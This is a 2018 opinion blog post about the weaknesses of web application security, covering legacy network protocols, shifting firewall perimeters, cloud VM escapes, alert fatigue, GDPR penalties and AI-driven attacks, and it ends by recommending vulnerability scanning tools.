• United States

Overcoming kludges to secure web applications

May 21, 20188 mins
Application SecurityEnterprise ApplicationsNetwork Security

Nothing is easy when applications lay upon multiple kludges of network architecture and flawed protocols. Without adequate safeguards, security results in a hit and miss approach.

When it comes to technology, nothing is static, everything is evolving. Either we keep inventing mechanisms that dig out new security holes, or we are forced to implement existing kludges to cover up the inadequacies in security on which our web applications depend.

The assault on the changing digital landscape with all its new requirements has created a black hole that needs attention. The shift in technology, while creating opportunities, has a bias to create security threats. Unfortunately, with the passage of time, these trends will continue to escalate, putting web application security at center stage.

Business relies on web applications. Loss of service to business-focused web applications not only affects the brand but also results in financial loss. The web application acts as the front door to valuable assets. If you don’t efficiently lock the door or at least know when it has been opened, valuable revenue-generating web applications are left compromised.

We need to work together to identify and fix vulnerabilities in the web application before the bad actors find ways to exploit them. With the introduction of machine-based threats using Artificial Intelligence (AI) security threats now come in many different forms.

The ongoing challenges

The problems lay in the fact that the underlying infrastructure is built without security in mind. Eventually, this shortfall has resulted in the use of numerous kludges to overcome the security inadequacies. Networking is complex and so is the design of the web application and web server.

Over the last decade, security paradigms have changed completely. Hypervisor escapes are scaring CIOs from the public cloud. To add to the challenge, now we have AI in the hands of bad actors. This lays the foundation for an unpredictable security landscape.

The combination of all these elements is causing the security professionals to move with certain caution and guardrails. The most appropriate way to protect the web application is at the application layer and not with another kludge.

Companies like Acunetix vulnerability scanner finds web application vulnerabilities such as SQL Injection and Cross-site Scripting (XSS). They arm applications with the appropriate scanning and vulnerability tools to stand a chance for both today’s and the unknown day-zero threats of tomorrow.

Unsecured underlying infrastructure

The underlying infrastructure, in which our applications live, is built without security in mind. This is not a design error. It is a design solution based on previous connectivity requirements. Bad actors did not exist back in those days when the foundations were being designed. Security was an afterthought. Internet Protocol (IP) was solely used to provide end-to-end connectivity and had no way to secure individual packets by default. A network left to defaults leaves the web application wide open.

The rise of security has bred a new type of requirement, which has led to the introduction of flawed protocols such as TLS/SSL. The entire Internet is reachable on flawed protocols, offering up ports of 80/443 to everyone, consequent on the global reachability of the Internet. Most of the Internet’s traffic rides on the top of TLS/SSL, yet the foundations were built without an initial authentication layer.

Two parties that have never met before can initiate and make a connection without ever knowing each other. The authentication process then occurs but only after the initial connection has been made. This opens up connections to a number of vulnerabilities, and the potential to eavesdrop on the communication between two endpoints occurs, unlocking the gateway for the “man in the middle “attacks.

Network & web application complexity

The underlying network is one of the most complicated structures, and complexity is the number one enemy of security. There are many moving parts to a network. The issues resulting from flawed protocols such as a lack of session layer in transmission control protocol (TCP) are often pushed down to the network layer to be solved, forcing the network to provide load balancing. These flaws are great for vendors as it creates new opportunities for them. However, at the same time, it adds layers of wrinkles to the communication path.

The web application stack has transitioned from simple text files to complicated application programming interface (API) calls. Everything now has become an API call, which has further changed the security requirement. The web application teams that design the application framework are usually not equipped with the correct security skills. Their main function is to get the code working, while security is often an afterthought. The teams that build the web server are often different from the teams that design and build the web applications. This leaves a huge gap for anyone armed with basic hacking tools.

Changing security paradigm

The birth of virtualization has created new traffic flows. Initially, we began with standard north to south but now we have a new style of east to west traffic flow. Old security devices were not designed to handle this type of flow change.

The bulky central firewall stuck in the middle of the network was the central security point. Traffic would have to trombone to the central firewall, adding to latency and building up piles of obsolete policy rules. The firewall is simply not enough anymore. This lead to the introduction of mini-firewalls located closer to the workload. They lacked feature parity with their big brother. This opened the lid on the holes in the network, empowering the bad actors to compromise valuable web applications.

Mini-firewalls closer to workloads resulted in the dissolution of the security perimeter. In the early days, when I set foot in networking, we had static boundaries. A demilitarized zone (DMZ) would hold external sources and a bulky firewall would control all the policies between a number of predefined interfaces. The changing security parameter now allows the external resource entry to the network. Not only does this bring technical challenges, but it also brings to light issues with team collaboration. Who controls the new firewalls? And do those in charge have appropriate security knowledge? With the introduction of the cloud, the perimeters have become increasingly vulnerable.

The cloud entails a plethora of new virtualization technologies, they all tie together forming a multi-tenant environment. Different customers with different types of workloads potentially share the same physicals. The scary fact is that we have seen what is known as hypervisor breakouts or virtual machine (VM) escapes. This is where a bad actor can compromise one VM and use that to beachhead and access a VM from an entirely different customer.

A world of false positives and high penalties

We live in a world of false positives and alert fatigue. Many data breaches and exfiltrations go unnoticed for months. The human mind cannot simply process all the alerts. The rising level of false positives may demotivate security professionals to look deeper into the potential security threats. This leaves open many paths for a bad actor to enter the network.

Once a bad actor gains access, he or she can circumvent security defenses such as a firewall or intrusion detection system (IDS). There are known ways that are easy to learn to allow lateral movement across the network, causing data breaches and data exfiltration. Social media such as Twitter accounts and protocols that are not used to transfer data, such domain name system (DNS) have been used to move sensitive information out of a network.

With General Data Protection Regulation (GDPR) landing, it’s not just about meeting compliance anymore. It’s about avoiding financial penalties. Organizations could incur fines up to 4% of the annual turnover or over 20 million dollars upon a data breach. To add insult to injury, this is amplified by the fact that we now have machine-based cybercriminals to deal with.

Machine-based AI attacks

We started with a human attacker and now we have entered into a world of machine-based AI threats. The major turning point for security came in the form of the automatic spreading of malware. Now experts are of an opinion that we are entering into a new era with AI-based threats.

The machine-based AI that was invented for very good reasons is now being used by cybercriminals. They can change their signatures and vectors automatically in response to the defense side. They are now quicker and a lot more dangerous.

AI-based attacks are leagues ahead of the traditional command and control (C&C) servers that still require human intervention. AI removes human involvement. The machine does not stop, it will dynamically change and throw everything automatically at the web application stack.

The roofs are leaky and are getting leakier. New vulnerabilities continue to arrive and drill new holes in the roof. You have two options. You can leave your web application in the hands of the network with existing security kludges, or you can effectively align your web application and web server with the appropriate vulnerability and scanning tools.


Matt Conran has more than 19 years of networking industry with entrepreneurial start-ups, government organizations and others. He is a lead Architect and successfully delivered major global greenfield service provider and data center networks. Core skill set includes advanced data center, service provider, security and virtualization technologies. He loves to travel and has a passion for landscape photography.

The opinions expressed in this blog are those of Matt Conran and do not necessarily represent those of IDG Communications, Inc., its parent, subsidiary or affiliated companies.